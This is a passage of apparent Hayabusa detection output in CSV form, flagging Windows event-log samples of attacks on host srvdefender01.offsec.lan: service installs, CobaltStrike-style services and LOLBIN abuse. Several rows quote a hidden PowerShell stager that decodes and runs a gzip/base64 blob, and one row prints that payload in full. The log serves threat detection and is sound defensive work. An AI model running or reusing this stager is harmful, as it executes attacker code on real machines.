oEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWi
ndow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: 
LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 
0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NT
moaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 
